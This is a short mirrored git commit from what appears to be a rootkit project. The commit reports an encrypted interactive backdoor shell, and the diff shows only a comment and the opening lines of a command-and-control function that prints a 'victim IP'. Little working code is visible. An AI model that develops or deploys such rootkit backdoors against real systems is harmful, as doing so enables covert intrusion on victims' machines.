mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-30 21:23:07 +08:00
Finished encrypted interactive shell and encrypted protocol implementation, V2 rootkit now fully functional
This commit is contained in:
@@ -188,6 +188,7 @@ void activate_command_control_shell(char* argv){
|
||||
free(local_ip);
|
||||
}
|
||||
|
||||
//Rootkit backdoor V2
|
||||
void activate_command_control_shell_encrypted(char* argv){
|
||||
char* local_ip = getLocalIpAddress();
|
||||
printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
|
||||
|
||||
Reference in New Issue
Block a user